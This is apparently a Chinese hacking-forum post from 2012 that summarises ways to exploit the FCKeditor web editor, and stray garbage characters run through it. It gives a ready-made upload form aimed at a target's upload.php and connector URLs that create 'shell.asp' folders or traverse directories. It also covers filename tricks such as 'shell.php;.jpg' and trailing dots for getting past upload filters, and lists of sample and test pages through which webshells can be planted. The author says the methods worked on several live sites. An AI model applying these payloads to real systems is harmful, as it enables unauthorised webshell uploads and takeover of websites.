Fckeditor漏洞利用总结 o$ H; b8 T/ x6 t" r7 V: i% a- R
查看编辑器版本
% X% L7 M( A' V1 {! O# Q KFCKeditor/_whatsnew.html) B" s! b9 ?2 }. C3 P+ Z
—————————————————————————————————————————————————————————————9 h) w" p8 C4 M$ f- Q7 ~6 S
9 d" I0 @) t* _: C2. Version 2.2 版本7 U |# k8 H: Y" T; v2 ?8 @7 a
Apache+linux 环境下在上传文件后面加个.突破!测试通过。5 r9 \! J/ a# r7 e
—————————————————————————————————————————————————————————————# j# \7 ?+ \5 E' n0 l5 Y/ u6 M
' O8 A' T5 i4 r' Q' Y3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。4 I9 f6 C9 R) m0 x0 v0 f
<form id="frmUpload" enctype="multipart/form-data"
' ?& |: c* N+ I; e: A: A# ^action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
) C9 t, u9 U' f, C. ]<input type="file" name="NewFile" size="50"><br>% }2 t8 P( ?; L8 \# s
<input id="btnUpload" type="submit" value="Upload">
- @# q; k2 @2 ^9 [. o' ~' l! b) d</form>
2 k$ F& [0 v7 V/ w4 l—————————————————————————————————————————————————————————————% P, K8 O& p) }. `" e
: {4 n# B5 _" i, {$ p( G Q( L4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
$ l6 {; ` m7 m6 d( T' [6 a 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。8 _/ f9 h3 U6 Q9 a
4.1:提交shell.php+空格绕过
1 c- S) v5 m) h3 I z L不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。$ j H0 N9 n1 }) Z' G
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
6 {8 B/ k: T% i8 b+ h4 _: g8 |—————————————————————————————————————————————————————————————: j. M. J {! g1 Z
& ^% }3 B$ o: G# i5 ]5. 突破建立文件夹9 d V! w: R- m% d0 Z
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
6 o' o5 c, [6 bFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp7 [1 r" O8 ]2 W
—————————————————————————————————————————————————————————————
" M, e* s0 X9 n0 e% G6 p, T$ p) d. \2 O4 P8 o" S# |3 W Z' X
6. FCKeditor 中test 文件的上传地址6 e& ?3 G+ R0 T( ^0 ]4 u
FCKeditor/editor/filemanager/browser/default/connectors/test.html
, p* X- |+ |9 ?/ b: b5 R. DFCKeditor/editor/filemanager/upload/test.html0 f0 |4 C" B/ s) D
FCKeditor/editor/filemanager/connectors/test.html% K- h3 j. _% \7 i$ F
FCKeditor/editor/filemanager/connectors/uploadtest.html* N( S- M2 ?2 l' u! s
—————————————————————————————————————————————————————————————
9 t. }- R$ V$ W; M8 D0 k8 x) o& h& Y
7.常用上传地址
) Y" ~6 Z8 N% vFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/7 R8 W1 `3 U' U6 H
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp" J" s1 J0 O$ h) B7 H: {( o% I
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
@; ?7 G* |) ?$ k' ^5 BJSP 版:
3 T2 P* u% `: Z' T% \FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp; ?9 N- t R/ N; G1 k2 O
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
& m1 Y# {6 Q* S件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。; `" ^* G2 K2 Q( _9 A! V
—————————————————————————————————————————————————————————————0 X& e# \0 T- m8 X( B& t" Z$ ~$ ~( ]
6 R# |; I- L4 o% D; }8.其他上传地址$ x% s' a, B$ G8 R& [8 ]
FCKeditor/_samples/default.html
- @/ x( V* D0 IFCKeditor/_samples/asp/sample01.asp
) |% J- h" L2 U& }; sFCKeditor/_samples/asp/sample02.asp
0 R0 Q# B2 H- V8 h: jFCKeditor/_samples/asp/sample03.asp
4 v1 m1 {% s3 Q0 oFCKeditor/_samples/asp/sample04.asp
1 @% m. L2 t9 q0 N0 g& ?( r一般很多站点都已删除_samples 目录,可以试试。
; w1 j& S/ s: y* oFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
7 R9 M; Q2 x* _' _) O j5 y4 ]—————————————————————————————————————————————————————————————; @) J, ]0 [1 i$ k( w5 E3 G$ f# R6 \. m
' z+ G$ x# f! D2 O9.列目录漏洞也可助找上传地址3 S8 e1 V( F- N* U# [8 V H( Z% G* C
Version 2.4.1 测试通过
: ^2 n. i. ]* N7 ~; c u4 E% B修改CurrentFolder 参数使用 ../../来进入不同的目录
! I) F# j& \+ D! T2 V4 N! U1 j3 {* a6 T- y/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp5 W" P0 ~! {( V# q, v) M3 b
根据返回的XML 信息可以查看网站所有的目录。
1 k$ o/ {3 |# XFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F' X! _" }& N# L; c) y0 I3 @( G
也可以直接浏览盘符:9 ~ c; k; k( f5 ]" l1 m) A: j
JSP 版本:
! h8 ~2 }' X0 r6 q; F! c% A! XFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F" V! u" N+ V! p& F, g! q
—————————————————————————————————————————————————————————————; P. F3 O. Y* [, k) W% k1 e
! u4 V, G( t* O# A6 u* R
10.爆路径漏洞9 V% B9 b; s/ G$ e
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
7 i$ L/ a* X3 m/ ]9 v—————————————————————————————————————————————————————————————
2 y* i) V* j5 P- t/ F9 Q/ l! M3 z! D' I+ E9 A: E. W- V% V; \
11. FCKeditor 被动限制策略所导致的过滤不严问题
. U: X( w4 \0 v) Z 影响版本: FCKeditor x.x <= FCKeditor v2.4.3
6 F2 W/ o2 ^$ ~. H: C. p8 k脆弱描述:
7 t3 r* J* f t7 Y# M g: H1 ]5 ]FCKeditor v2.4.3 中File 类别默认拒绝上传类型:+ z- e4 u0 q3 Z
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
6 L- b6 K( {6 D: mFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
: j( x2 U. w# B U9 F7 B* y 而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
/ {5 i9 u5 v& ~0 N 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
3 y5 f: S# _$ \—————————————————————————————————————————————————————————————$ F& f2 x3 r2 N" ]- v1 y' b ~
1 A: j y$ Z: m& B4 y) L! j12.最古老的漏洞,Type文件没有限制!
7 o. t1 }1 s( h3 q 我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! * H) q7 C& Q8 u
—————————————————————————————————————————————————————————————# `! E* @9 y. X& G4 C
& n) w0 U) K3 [6 r2 w3 N
===============================================================================================================================================
$ h5 N( W% e1 y2 i; `: b3 h6 R# ]$ X
& v8 U4 v$ z6 {5 |- S! NFCK编辑器jsp版本漏洞:
^! k0 e+ e- F: `6 _- ?# v
6 } e: f7 b" H. f( [6 i
. ^/ N% b$ O" p# c9 k. U" Z% U. _http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
]5 I9 ~0 r, p" I0 C
; s! K! ] s/ O. d' N4 Y上传马所在目录
' i+ F; |* ~3 m( |" t$ I5 AFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
3 a1 L' X& Z8 g# W上传shell的地址:
9 R! ~) a/ r N2 Q! j5 vhttp://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
9 ]6 H7 h f2 ]1 M( l2 s4 l跟版本有关系.并不是百分百成功. 测试成功几个站.& ~( {$ ~; a \& I
不能通杀.很遗憾.
2 i" R( Y5 T9 `1 f4 D# U1 Xhttp://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector4 v& N7 H% v: Y% o
如果以上地址不行可以试试- h9 f q2 W6 N. T1 B
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector% s& L0 N, _4 Z6 O- O* B
FCKeditor/_samples/
3 T8 ^: R) y! q% }' i1 rFCKeditor/_samples/default.html. x3 V: |& M3 C6 w: D) E; `3 u
FCKeditor/editor/fckeditor.htm
9 p9 ~1 R. ] nFCKeditor/editor/fckdialog.html- B) B6 `, N% C/ U T
1 O$ j* W) u/ ` N/ y* J
7 E* J* A6 \" C' N( G2 K
& L9 W; q8 q! D' Q7 A解析漏洞+未重命名文件时上传漏洞 1.asp;jpg3 |1 F' c+ n2 S# p- b8 ?, \
|
发表于 2012-9-13 17:01:39
收藏
支持
反对